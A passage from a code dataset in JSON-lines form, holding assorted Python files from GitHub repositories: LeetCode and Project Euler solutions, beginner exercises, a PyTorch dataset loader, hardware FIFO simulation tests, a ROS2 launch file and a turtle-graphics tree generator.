jsonify(status=status)\r\n","repo_name":"Quantaxer/Game-Backlogger","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36060879555","text":"\ndef combinationSum(candidates, target):\n result = []\n nums = sorted(candidates)\n if sum(nums) == target: return [nums]\n if sum(nums) < target: return []\n def tracking(temp, nums, target):\n if sum(temp) == target:\n if sorted(temp) not in result:\n result.append(sorted(temp))\n return\n if sum(temp) > target:\n return\n for i in nums:\n temp.append(i)\n nums.remove(i)\n Newnums = list(nums)\n tracking(temp, Newnums, target)\n nums.insert(0, i)\n temp.pop()\n tracking([], nums, target)\n return result\n\n\nif __name__ == \"__main__\":\n candidates = [1, 2]\n target = 2\n print(combinationSum(candidates, target))\n\n\n\n","repo_name":"ficherfisher/leetcode","sub_path":"39CombinationSum.py","file_name":"39CombinationSum.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5683605258","text":"first_name = input('What is your first name? ').title()\nlast_name = input('What is your last name? ').title()\nyear_born = int(input('When were you born? '))\ncurrent_year = 2021\nage = current_year - year_born\ncity = input('Name of the city your are living in? ').title()\ncountry = input('Conuntry you are living in? ').title()\ngender = input('What is your gender F or M? ' ).lower()\npronoun = ''\n\nif gender == 'f' or 'Female':\n pronoun = 'She'\nelif gender == 'm' or 'male':\n pronoun = 'He' \n\n\nprint(f'{pronoun} is {first_name} {last_name}. {pronoun} is {age}. {pronoun} lives in {city} {country} ')","repo_name":"meronfan/Five-Days-of-Python","sub_path":"Day3/conditional.py","file_name":"conditional.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33406220704","text":"from time import sleep\n\nfrom ulakbus.models import BAPProje\nfrom ulakbus.models import User\nfrom ulakbus.models import Okutman\nfrom ulakbus.models import Personel\n\nfrom zengine.lib.test_utils import BaseTestCase\n\n\nclass TestCase(BaseTestCase):\n\n def lane_change_massage_kontrol(self, resp):\n assert resp.json['msgbox']['title'] == 'Teşekkürler!'\n assert resp.json['msgbox']['msg'] == 'Bu iş akışında şuan için gerekli adımları ' \\\n 'tamamladınız. İlgili kişiler, iş akışına ' \\\n 'katılmaları için haberdar edildiler.'\n\n def test_bap_proje_basvuru(self):\n user = User.objects.get(username='ogretim_uyesi_1')\n personel = Personel.objects.get(user=user)\n okutman = Okutman.objects.get(personel=personel) # Hanife Şener\n\n proje = BAPProje()\n proje.ad = \"Bap Test proje iptal talebi projesi\"\n proje.yurutucu = okutman\n proje.durum = 5\n proje.save()\n\n for i in range(4):\n if i == 1:\n token, user = self.get_user_token(username='ogretim_uyesi_1')\n self.prepare_client('/bap_yurutucu_degisikligi_talebi', user=user, token=token)\n resp = self.client.post()\n\n assert resp.json['forms']['form'][0]['helpvalue'] == \"%s projeniz için \" \\\n \"bulunduğunuz iptal talebi \" \\\n \"reddedilmiştir. \" \\\n \"Red Açıklaması: Red edildi.\" \\\n % proje.ad\n self.client.post(form={'bitir': 1})\n sleep(1)\n continue\n elif i == 3:\n token, user = self.get_user_token(username='ogretim_uyesi_1')\n self.prepare_client('/bap_yurutucu_degisikligi_talebi', user=user, token=token)\n resp = self.client.post()\n\n assert resp.json['forms']['form'][0]['helpvalue'] == \"%s projeniz için \" \\\n \"bulunduğunuz iptal talebi \" \\\n \"koordinasyon birimi \" \\\n \"tarafından kabul edilip \" \\\n \"Komisyon Gündemine \" \\\n \"alınmıştır.\" % proje.ad\n\n self.client.post(form={'bitir': 1})\n sleep(1)\n continue\n else:\n self.prepare_client('/bap_proje_iptal_talep', user=user)\n\n self.client.post()\n\n resp = self.client.post(form={'proje': proje.key,\n 'ilerle': 1})\n\n assert resp.json['object'][u'Proje Adı'] == proje.ad\n\n resp = self.client.post(form={'aciklama': 'Kişisel sebeblerden dolayı '\n 'bap test projesinin iptalini istiyorum.',\n 'onay': 1})\n\n assert resp.json['forms']['form'][0]['helpvalue'] == \"%s projesini iptal için onaya \" \\\n \"yollayacaksınız. Yollamak \" \\\n \"istiyor musunuz ?\" % proje.ad\n\n resp = self.client.post(form={'gonder': 1})\n\n self.lane_change_massage_kontrol(resp)\n\n sleep(1)\n\n token, user = self.get_user_token(username='bap_koordinasyon_birimi_1')\n self.prepare_client('/bap_yurutucu_degisikligi_talebi', user=user, token=token)\n\n resp = self.client.post()\n\n assert resp.json['object']['İptal Talep Açıklama'] == \"Kişisel sebeblerden dolayı \" \\\n \"bap test projesinin \" \\\n \"iptalini istiyorum.\"\n\n if i == 0:\n self.client.post(form={'reddet': 1})\n\n resp = self.client.post(form={'red_aciklama': 'Red edildi.',\n 'red_gonder': 1})\n else:\n resp = self.client.post(cmd='onayla', form={'onayla': 1}, object_key=proje.key)\n assert resp.json['forms']['schema']['title'] == \"Proje İptal Talebi Talebini \" \\\n \"Komisyona Yolla\"\n resp = self.client.post(form={'komisyona_gonder': 1})\n\n self.lane_change_massage_kontrol(resp)\n","repo_name":"zetaops/ulakbus","sub_path":"tests/test_bap_proje_iptal_talep.py","file_name":"test_bap_proje_iptal_talep.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"tr","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"20240255185","text":"import os\nimport numpy as np\nimport random\nimport torch\nimport torch.utils.data as data\nfrom tqdm import tqdm \nfrom torchvision import transforms\nfrom utils.file_processing import image_file_to_array\nclass BongardDataset(data.Dataset):\n\t\"\"\"\n\t\thttps://github.com/NVlabs/Bongard-LOGO\n\t\"\"\"\n\n\tdef __init__(self, random_seed=123, batch_type='train', img_dim=(512,512), batch_size=None, one_hot_size=3, root='./ShapeBongard_V2'):\n\t\t'''\n\t\tArgs:\n\t\t- batch_type: training, testing or validation set\n\t\t- img_dim: (height, weight) of image in input layer\n\t\t- root: directory where dataset will be stored\n\t\t- one_hot_size: one_hot_vector size of a label (left, right, unlabeled)\n\t\tUsage: \n\t\t\ttr_dataset = BongardDataset(batch_type='train', one_hot_size=3, root='./ShapeBongard_V2')\n\t\t\t# returns tr_dataset.y, tr_dataset.x_paths\n\t\t'''\n\n\t\tsuper(BongardDataset, self).__init__()\n\t\tself.seed = random_seed\n\t\tself.root = root\n\t\tself.batch_type = batch_type\n\t\tself.batch_size = batch_size\n\t\tself.one_hot_size = one_hot_size\n\t\tself.img_h, self.img_w = img_dim\n\t\tself.img_dim = self.img_h*self.img_w\n\t\t\n\t\t# as stated in paper\n\t\tself.num_train = 9300\n\t\tself.num_val = 900\n\n\t\t# in dataset dir\n\t\tself.num_classes = 2\n\t\tself.num_samples_per_class = 7\n\t\t\n\n\t\t# resize original 512x512 image to 256x246\n\t\tself.transform = transforms.Compose([transforms.ToPILImage(mode=None),\n\t\t\t\t\t\t\t\t\t\t\t\ttransforms.Resize(img_dim)])\n\n\t\tif not os.path.exists(self.root):\n\t\t\traise RuntimeError('Dataset not found.')\n\n\t\t\n\t\t# basic, free-form, abstract --> images --> pos, neg --> img.png\n\t\t# problem_type/images/problem_class/img.png\n\t\tproblem_folders = [os.path.join(self.root, problem_type, 'images', problem_class) #img path\n\t\t\t\t\t\t for problem_type in os.listdir(self.root) # basic, free-form, abstract\n\t\t\t\t\t\t if os.path.isdir(os.path.join(self.root, problem_type))\n\t\t\t\t\t\t for problem_class in os.listdir(os.path.join(self.root, problem_type, 'images')) # neg, pos\n\t\t\t\t\t\t if os.path.isdir(os.path.join(self.root, problem_type, 'images', problem_class))]\n\n\t\trandom.seed(self.seed)\n\t\trandom.shuffle(problem_folders)\n\n\t\tif self.batch_type == 'train':\n\t\t\tself.folders = problem_folders[: self.num_train]\n\t\telif self.batch_type == 'val':\n\t\t\tself.folders = problem_folders[self.num_train : self.num_train + self.num_val]\n\t\telif self.batch_type == 'test':\n\t\t\tself.folders = problem_folders[self.num_train + self.num_val:]\n\t\telse:\n\t\t\traise ValueError('Batch must be of type Train, Validation or Test')\n\n\t\tget_label = lambda folder, class_name : [class_name for problem_img in \n\t\t\t\t\t\tos.listdir(os.path.join(folder, str(class_name)))]\n\t\tprint(\"Fetching Y\"+batch_type+\" labels\")\n\t\tself.y = np.array([list(zip(np.eye(one_hot_size)[get_label(problem, 0)], \n\t\t\t\t\tnp.eye(one_hot_size)[get_label(problem, 1)])) \n\t\t\t\t\tfor problem in tqdm(self.folders)])\n\t\tassert self.y.shape == (len(self.folders), self.num_samples_per_class, \n\t\t\t\t\t\t\t\tself.num_classes, self.one_hot_size)\n\n\t\tprint(\"Fetching X\"+batch_type+\" paths\")\t\t\n\t\tget_img_path = lambda folder, class_name: [os.path.join(folder, str(class_name), problem_img) \n\t\t\t\t\t\t\tfor problem_img in os.listdir(os.path.join(folder, str(class_name)))]\n\t\tself.x_paths = np.array([list(zip(get_img_path(problem, 0), get_img_path(problem, 1))) \n\t\t\t\t\t\t\tfor problem in tqdm(self.folders)])\n\t\tassert self.x_paths.shape == (len(self.folders), self.num_samples_per_class, self.num_classes)\n\n\tdef __getitem__(self, idx):\n\t\t'''\n\t\tArgs:\n\t\t- idx: problem at idx\n\t\t\n\t\tReturns:\n\t\t- problem_imgs: img data for each img in problem, shape: num_samples_per_class x img_dim\n\t\t- labels: labels for each img in problem, shape: num_samples_per_class x num_classes x one_hot_size\n\t\t- problem_path: str obj is path to problem\n\t\t'''\n\t\t\n\t\tget_imgs_at_idx = lambda x: torch.stack([torch.stack([image_file_to_array(class_1, self.transform), \n\t\t\t\t\t\t\t\t\t\timage_file_to_array(class_2, self.transform)])\n\t\t\t\t\t\t\t\t\t\tfor class_1, class_2 in x])\n\n\t\tbatch_imgs = torch.stack([get_imgs_at_idx(batch_i) for batch_i in self.x_paths[idx]])\n\n\t\t#assert batch_imgs.shape == (self.batch_size, self.num_samples_per_class, \n\t\t#\t\t\t\t\t\t\tself.num_classes, self.img_dim)\n\t\t\n\t\tbatch_y = torch.from_numpy(self.y[idx])\n\t\t\n\t\tbatch_path = [os.path.split(path)[0] for path in self.x_paths[idx][:, 1, 1]]\n\t\t\n\t\treturn batch_imgs, self.y[idx], batch_path\n\n\tdef __len__(self):\n\t\treturn len(self.x_paths)\n\n#class BongardLOGODataset(data.Dataset):\n\"\"\"\nLOGO vectors for program induction\n\"\"\"\n\n","repo_name":"aishniparab/myaiframework","sub_path":"datasets/bongard_dataset.py","file_name":"bongard_dataset.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17410081905","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\n\nfrom hwt.interfaces.std import FifoReader, FifoWriter\nfrom hwt.interfaces.utils import addClkRstn\nfrom hwt.simulator.simTestCase import SimTestCase\nfrom hwt.synthesizer.unit import Unit\nfrom hwtLib.mem.fifo import Fifo\nfrom hwtSimApi.constants import CLK_PERIOD\nfrom hwtSimApi.triggers import Timer, WaitWriteOnly\n\n\nclass FifoReaderPassTrought(Unit):\n\n def _declr(self):\n addClkRstn(self)\n self.din = FifoReader()\n self.dout = FifoReader()._m()\n\n def _impl(self):\n self.dout(self.din)\n\n\nclass FifoWriterPassTrought(FifoReaderPassTrought):\n\n def _declr(self):\n addClkRstn(self)\n self.din = FifoWriter()\n self.dout = FifoWriter()._m()\n\n\nclass FifoReaderAgentTC(SimTestCase):\n CLK = CLK_PERIOD\n\n @classmethod\n def setUpClass(cls):\n cls.u = FifoReaderPassTrought()\n cls.compileSim(cls.u)\n\n def test_fifoReader(self):\n u = self.u\n self.randomize(u.din)\n self.randomize(u.dout)\n\n ref = [i for i in range(30)]\n u.din._ag.data.extend(ref)\n self.runSim(120 * self.CLK)\n\n self.assertValSequenceEqual(u.dout._ag.data, ref)\n\n\nclass FifoWriterAgentTC(SimTestCase):\n CLK = CLK_PERIOD\n\n @classmethod\n def setUpClass(cls):\n cls.u = FifoWriterPassTrought()\n cls.compileSim(cls.u)\n\n def test_fifoWriter(self):\n u = self.u\n\n self.randomize(u.din)\n self.randomize(u.dout)\n\n ref = [i for i in range(30)]\n u.din._ag.data.extend(ref)\n self.runSim(120 * self.CLK)\n\n self.assertValSequenceEqual(u.dout._ag.data, ref)\n\n\nclass FifoTC(SimTestCase):\n ITEMS = 4\n IN_CLK = CLK_PERIOD\n OUT_CLK = CLK_PERIOD\n CLK = max(IN_CLK, OUT_CLK) # clock used for resolving of sim duration\n\n @classmethod\n def setUpClass(cls):\n u = cls.u = Fifo()\n u.DATA_WIDTH = 8\n u.DEPTH = cls.ITEMS\n u.EXPORT_SIZE = True\n cls.compileSim(cls.u)\n\n def getFifoItems(self):\n m = self.rtl_simulator.io.memory\n return set([int(x.read()) for x in m])\n\n def getUnconsumedInput(self):\n return self.u.dataIn._ag.data\n\n def test_fifoSingleWord(self):\n u = self.u\n\n expected = [1]\n u.dataIn._ag.data.extend(expected)\n\n self.runSim(9 * self.CLK)\n\n collected = u.dataOut._ag.data\n self.assertValSequenceEqual(collected, expected)\n\n def test_fifoWriterDisable(self):\n u = self.u\n\n ref = [i + 1 for i in range(self.ITEMS)]\n u.dataIn._ag.data.extend(ref)\n\n def init():\n u.dataIn._ag.setEnable(False)\n return\n yield\n\n self.procs.append(init())\n\n self.runSim(8 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, [])\n self.assertValSequenceEqual(self.getUnconsumedInput(), ref)\n\n def test_normalOp(self):\n u = self.u\n\n expected = list(range(4))\n u.dataIn._ag.data.extend(expected)\n\n self.runSim(9 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, expected)\n\n def test_multiple(self, sizeValues=[\n 0, 1, 2, 3, 4, 4, 4, 4, 4,\n 3, 3, 3, 3, 3, 3, 3, 3, 3,\n 3, 3, 3, 3, 2, 1, 0, 0]):\n u = self.u\n\n def openOutputAfterWile():\n u.dataOut._ag.setEnable(False)\n yield Timer(self.CLK * 9)\n u.dataOut._ag.setEnable(True)\n\n self.procs.append(openOutputAfterWile())\n\n expected = list(range(2 * 8))\n u.dataIn._ag.data.extend(expected)\n\n self.runSim(27 * self.CLK)\n\n collected = u.dataOut._ag.data\n if u.EXPORT_SIZE:\n self.assertValSequenceEqual(\n u.size._ag.data, sizeValues)\n\n self.assertValSequenceEqual(collected, expected)\n\n def test_tryMore(self):\n u = self.u\n\n ref = [i + 1 for i in range(self.ITEMS * 3)]\n u.dataIn._ag.data.extend(ref)\n\n def init():\n yield WaitWriteOnly()\n u.dataOut._ag.setEnable(False)\n\n self.procs.append(init())\n\n self.runSim(self.ITEMS * 4 * self.CLK)\n\n collected = u.dataOut._ag.data\n self.assertSetEqual(self.getFifoItems(), set(ref[:self.ITEMS]))\n self.assertValSequenceEqual(collected, [])\n self.assertValSequenceEqual(self.getUnconsumedInput(), ref[self.ITEMS:])\n\n def test_tryMore2(self, capturedOffset=2):\n u = self.u\n\n ref = [i + 1 for i in range(self.ITEMS * 2)]\n u.dataIn._ag.data.extend(ref)\n\n def closeOutput():\n yield Timer(self.OUT_CLK * 4)\n u.dataOut._ag.setEnable(False)\n\n self.procs.append(closeOutput())\n self.runSim(15 * self.CLK)\n\n collected = [int(x) for x in u.dataOut._ag.data]\n\n self.assertSetEqual(self.getFifoItems(),\n set(ref[capturedOffset:self.ITEMS + capturedOffset]))\n se = self.assertSequenceEqual\n se(collected, ref[:capturedOffset])\n se(self.getUnconsumedInput(), ref[self.ITEMS + capturedOffset:])\n\n def test_randomizedIn(self):\n self._test_randomized(True, False)\n\n def test_randomizedOut(self):\n self._test_randomized(False, True)\n\n def test_randomizedAll(self):\n self._test_randomized(True, True)\n\n def _test_randomized(self, randIn, randOut):\n u = self.u\n LEN = 80\n ref = [i + 1 for i in range(LEN)]\n u.dataIn._ag.data.extend(ref)\n if randIn:\n self.randomize(u.dataIn)\n if randOut:\n self.randomize(u.dataOut)\n\n self.runSim(int(2.5 * LEN * self.CLK))\n\n collected = u.dataOut._ag.data\n self.assertSequenceEqual(collected, ref)\n\n def test_doloop(self):\n u = self.u\n u.dataIn._ag.data.extend([1, 2, 3, 4, 5, 6])\n\n self.runSim(12 * self.CLK)\n\n collected = u.dataOut._ag.data\n self.assertSequenceEqual([1, 2, 3, 4, 5, 6], collected)\n self.assertSequenceEqual([], u.dataIn._ag.data)\n\n def test_nop(self):\n u = self.u\n self.runSim(12 * self.CLK)\n self.assertEqual(len(u.dataOut._ag.data), 0)\n\n def test_stuckedData(self):\n u = self.u\n u.dataIn._ag.data.append(1)\n\n def init():\n yield WaitWriteOnly()\n u.dataOut._ag.setEnable(False)\n\n self.procs.append(init())\n\n self.runSim(12 * self.CLK)\n self.assertEqual(len(u.dataOut._ag.data), 0)\n\n def test_withPause(self):\n u = self.u\n ref = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n u.dataIn._ag.data.extend(ref)\n\n def pause():\n yield Timer(3 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(False)\n\n yield Timer(3 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(True)\n\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(False)\n\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(True)\n\n self.procs.append(pause())\n\n self.runSim(20 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, ref)\n self.assertSequenceEqual(self.getUnconsumedInput(), [])\n\n def test_withPause2(self):\n u = self.u\n ref = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n u.dataIn._ag.data.extend(ref)\n\n def pause():\n yield Timer(4 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(False)\n yield Timer(3 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(True)\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(False)\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(True)\n\n self.procs.append(pause())\n\n self.runSim(20 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, ref)\n self.assertSequenceEqual(self.getUnconsumedInput(), [])\n\n def test_passdata(self):\n u = self.u\n ref = [1, 2, 3, 4, 5, 6]\n u.dataIn._ag.data.extend(ref)\n\n self.runSim(12 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, ref)\n self.assertValSequenceEqual(self.getUnconsumedInput(), [])\n\n\nif __name__ == \"__main__\":\n _ALL_TCs = [FifoWriterAgentTC, FifoReaderAgentTC, FifoTC]\n testLoader = unittest.TestLoader()\n loadedTcs = [testLoader.loadTestsFromTestCase(tc) for tc in _ALL_TCs]\n suite = unittest.TestSuite(loadedTcs)\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/mem/fifo_test.py","file_name":"fifo_test.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"17938755823","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom launch import LaunchDescription\nfrom launch_ros.actions import Node\nfrom launch.actions import ExecuteProcess, IncludeLaunchDescription, RegisterEventHandler\nfrom launch.event_handlers import OnProcessExit\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\nfrom launch_ros.substitutions import FindPackageShare\n\n\nimport xacro\nimport yaml\n\n\ndef generate_launch_description():\n\n #Joy_sub to motor_control node\n motor_node = Node(package='rpi_robot', executable='rpi_motor')\n\n #Camera_pub node\n cam_node = Node(package=\"v4l2_camera\",\n executable=\"v4l2_camera_node\",\n name=\"v4l2_camera_node\",\n parameters=[{\"image_size\": \"[640,480]\", \"camera_frame_id\": \"camera_link_optical\"}],\n )\n\n #\n rpi_robot_description_path = os.path.join(\n get_package_share_directory('rpi_robot_description'))\n\n #Getting robot urdf\n xacro_file = os.path.join(rpi_robot_description_path,\n 'urdf',\n 'rpi_robot.urdf.xacro')\n\n doc = xacro.parse(open(xacro_file))\n xacro.process_doc(doc)\n robot_description_config = doc.toxml()\n robot_description = {'robot_description': robot_description_config}\n\n #Robot_state_publisher node\n node_robot_state_publisher = Node(\n package='robot_state_publisher',\n executable='robot_state_publisher',\n output='screen',\n parameters=[robot_description]\n )\n\n #Lidar_pub node\n lidar_driver_node = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([\n FindPackageShare(\"ydlidar_ros2_driver\"), '/launch', '/ydlidar_launch.py'])\n )\n \n\n # Launch them all!\n return LaunchDescription([\n motor_node,\n cam_node,\n #node_robot_state_publisher,\n #lidar_driver_node\n ])\n","repo_name":"E12-CO/rpi_robot","sub_path":"launch/robot_launch.py","file_name":"robot_launch.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38122401340","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\ndef lowestCommonAncestor(root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root in (None, p, q): \n return root\n left = lowestCommonAncestor(root.left, p, q)\n right = lowestCommonAncestor(root.right, p, q)\n if left and right:\n return root # if p and q are respectively in the left and right subtrees of root, then root is their LCA\n else:\n return left if left else right # either one of p,q is in the subtree of root, or none is. If none is, this will eventually return None\n#time O(n)\n#space O(n)\n","repo_name":"0xspringtime/leetcode","sub_path":"0236n.py","file_name":"0236n.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39997952873","text":"'''\nConsecutive prime sum\nProblem 50\nThe prime 41, can be written as the sum of six consecutive primes:\n\n41 = 2 + 3 + 5 + 7 + 11 + 13\nThis is the longest sum of consecutive primes that adds to a prime below one-hundred.\n\nThe longest sum of consecutive primes below one-thousand that adds to a prime, contains 21 terms, and is equal to 953.\n\nWhich prime, below one-million, can be written as the sum of the most consecutive primes?\n'''\n\nfrom math import sqrt\nprimes = [2, 3]\n\n\ndef is_prime(a):\n result = True\n l = int(sqrt(a))\n for p in primes:\n if p > l:\n break\n elif a % p == 0:\n result = False\n break\n return result\n\n\ndef main():\n\n for i in range(5, 1000000, 2):\n if is_prime(i):\n primes.append(i)\n\n #primes_f = [ i for i in primes if i < 1000]\n print(\"step 1 done : \", len(primes))\n\n sub = []\n max_s = 0\n max_l = 0\n s = 0\n sl = 0\n\n for i in range(len(primes)):\n sub = primes[:i + 1]\n s = sum(sub)\n sl = len(sub)\n if s > 1000000:\n break\n if s in primes:\n max_l = sl\n sax_s = s\n else:\n while (sl > max_l):\n sub[:1] = []\n sl = len(sub)\n s = sum(sub)\n if (s in primes):\n if sl > max_l:\n max_l = sl\n max_s = s\n\n print(\" Done : \", max_s, \" len=\", max_l)\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"murli777/Project-Euler-Solutions","sub_path":"src/001-050/P050.py","file_name":"P050.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15310238463","text":"# Adding two lists together using for loops\n\n#first way\n\nlist_1 = [\"Shirt\", \"Pants\", \"Sweater\", \"Socks\", \"Jacket\"] \nlist_2 = [\"Hat\", \"Watch\", \"Shoes\"]\nfor list_3 in list_1:\n list_3 = list_1 + list_2\nprint(list_3)\n#second way\nlist_1 = [\"Shirt\", \"Pants\", \"Sweater\", \"Socks\", \"Jacket\"]\nlist_2 = [\"Hat\", \"Watch\", \"Shoes\"]\nfor list_3 in list_2:\n list_1.append(list_3)\nprint(list_1)\n\n#sum = 5\n#numbers = [1,10,2]\n#for sum in numbers:\n#print(sum +1)\n\nlist_1 = [1, 2, 3, 4]\nlist_2 = [5, 6, 7, 8]\nlist_5 = []\n\nlength = len(list_1)\nfor i in range(length):\n result = list_1[i] + list_2[i]\n print(list_1[i], \"+\" ,list_2[i], \"=\", result)\n list_5.append(result)\nprint(list_5)","repo_name":"itsAimen/Python-Learning","sub_path":"Loops.py/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70905419665","text":"from dotenv import load_dotenv\nimport os\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nload_dotenv()\n\n\nclass Config(object):\n DEBUG = False\n TESTING = False\n CSRF_ENABLED = True\n\n\nclass Prod(Config):\n DEBUG = False\n\n\nclass Dev(Config):\n DEVELOPMENT = True\n DEBUG = True\n","repo_name":"DResthal/ConfigManageUtils","sub_path":"configApi/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14075512181","text":"def menu():\r\n print(\"Menu: \")\r\n print(\"[1] - Importar palabras clave.\")\r\n print(\"[2] - Mostrar palabras clave.\")\r\n print(\"[0] - Salir\")\r\n\r\n\r\ndef elegirOpcion():\r\n opcion = 0\r\n while True:\r\n try:\r\n opcion = int(input(\"Opcion: \"))\r\n if opcion in [0, 1, 2]:\r\n break\r\n except ValueError:\r\n print('ERROR: Introduzca un numero')\r\n return opcion\r\n\r\n\r\ndef carga_keywords():\r\n claves = []\r\n with open('keywords.txt') as f:\r\n for linea in f:\r\n claves += linea.split()\r\n return claves\r\n\r\n\r\ndef muestraKeywords(claves):\r\n vuelta = 1\r\n for contador, clave in enumerate(claves):\r\n if contador < 20 * vuelta:\r\n print(clave)\r\n else:\r\n input('Mostrar mas...')\r\n print(clave)\r\n vuelta += 1\r\n\r\n\r\ndef flujo():\r\n while True:\r\n menu()\r\n opcion = elegirOpcion()\r\n\r\n if opcion == 0:\r\n break\r\n elif opcion == 1:\r\n keywords = carga_keywords()\r\n elif opcion == 2:\r\n muestraKeywords(keywords)\r\n\r\n\r\nif __name__ == '__main__':\r\n flujo()\r\n","repo_name":"aperonac/j2logo-ejericios","sub_path":"Ejercicio 1/Ejercicio1.py","file_name":"Ejercicio1.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24202202932","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[12]:\n\n\nimport datetime\nclass Temperature:\n \n temp=0;\n \n def __init__(self,temp):\n self.temp=temp;\n \n def ToFahrenheit(self):\n InFahrenheit = float((9 * self.temp) / 5 + 32)\n return InFahrenheit\n \n def ToCelcius(self):\n InCelcius = float((self.temp - 32) * 5 / 9)\n return InCelcius\n \nclass Time(Temperature):\n \n \n def time():\n cur_tim=datetime.datetime.now()\n return cur_tim\n \n \n pass\n\n \n \ninp_temp1 = float(input(\"\"\"Enter the input in Celcius:\"\"\"))\ntemp_fah=Temperature(inp_temp1)\nprint(temp_fah.ToFahrenheit())\n\ninp_temp2 = float(input(\"\"\"Enter the input in Fahrenheit\"\"\"))\ntemp_cel=Temperature(inp_temp2)\nprint(temp_cel.ToCelcius())\n\nx=Time(23)\nprint(x.ToFahrenheit())\n\n\ny=Time.time()\nprint(y)\n\n\n\n\n \n \n \n \n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"akhileshgowda7/Python-2","sub_path":"FahToCel.py","file_name":"FahToCel.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73839674707","text":"#---- foo52ru ---------\r\n# генерация дерева без листьев\r\n# https://youtu.be/mAz46Z5curo\r\nimport turtle\r\nfrom random import randint\r\nturtle.hideturtle()\r\nturtle.tracer(0)\r\nturtle.penup()\r\nturtle.setposition(0,-300)\r\nturtle.left(90)\r\nturtle.pendown()\r\nthick = 16\r\nturtle.pensize(thick)\r\n\r\naxiom = \"22220\"\r\naxmTemp = \"\"\r\nitr = 11\r\nangl = 20\r\ndl = 10\r\nstc = []\r\n\r\ntranslate={\"1\":\"21\",\r\n \"0\":\"1[-20]+20\"}\r\n\r\nfor k in range(itr):\r\n for ch in axiom:\r\n if ch in translate:\r\n axmTemp+=translate[ch]\r\n else:\r\n axmTemp+=ch\r\n axiom = axmTemp\r\n axmTemp = \"\"\r\n\r\nfor ch in axiom:\r\n if ch == \"+\":\r\n turtle.right(angl - randint(-13,13))\r\n elif ch == \"-\":\r\n turtle.left(angl - randint(-13,13))\r\n elif ch == \"2\":\r\n if randint(0,10)>5:\r\n turtle.forward(dl) \r\n elif ch == \"1\":\r\n turtle.forward(dl)\r\n elif ch == \"0\":\r\n turtle.forward(dl) \r\n elif ch == \"[\":\r\n thick = thick*0.75\r\n turtle.pensize(thick)\r\n stc.append(thick)\r\n stc.append(turtle.xcor())\r\n stc.append(turtle.ycor())\r\n stc.append(turtle.heading())\r\n elif ch == \"]\":\r\n turtle.penup()\r\n turtle.setheading(stc.pop())\r\n turtle.sety(stc.pop())\r\n turtle.setx(stc.pop())\r\n thick = stc.pop()\r\n turtle.pensize(thick)\r\n turtle.pendown()\r\nturtle.update() \r\nturtle.mainloop()\r\n","repo_name":"foo52ru/L-systems-Trees","sub_path":"notLeafs.py","file_name":"notLeafs.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6824310582","text":"import os\nimport re\nimport 